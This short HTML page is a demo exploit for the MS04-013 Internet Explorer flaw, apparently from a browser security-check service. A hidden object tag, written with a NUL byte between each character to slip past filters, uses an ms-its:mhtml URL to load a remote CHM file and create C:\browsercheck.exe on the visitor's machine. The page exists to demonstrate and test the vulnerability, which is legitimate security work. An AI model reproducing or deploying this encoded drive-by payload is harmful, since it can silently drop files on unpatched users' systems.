This demo exploit tries to create the file C:\browsercheck.exe. See: MS04-013
In the object tag every other char is NUL.
�<�o�b�j�e�c�t� � � �d�a�t�a�=�"�m�s�-�i�t�s�:�m�h�t�m�l�:�f�i�l�e�:�/�/�C�:�\�f�o�o�.�m�h�t�m�l�!�h�t�t�p�:�/�/�w�w�w�e�d�i�t�.�h�e�i�s�e�.�d�e�/�s�e�c�u�r�i�t�y�/�d�i�e�n�s�t�e�/�b�r�o�w�s�e�r�c�h�e�c�k�/�d�e�m�o�s�/�i�e�/�m�h�t�m�l�/�e�x�p�.�c�h�m�:�:�e�x�p�l�o�i�t�.�h�t�m�"� � � �t�y�p�e�=�"�t�e�x�t�/�x�-�s�c�r�i�p�t�l�e�t�"� � � �s�t�y�l�e�=�"�v�i�s�i�b�i�l�i�t�y�:�h�i�d�d�e�n�"�>� �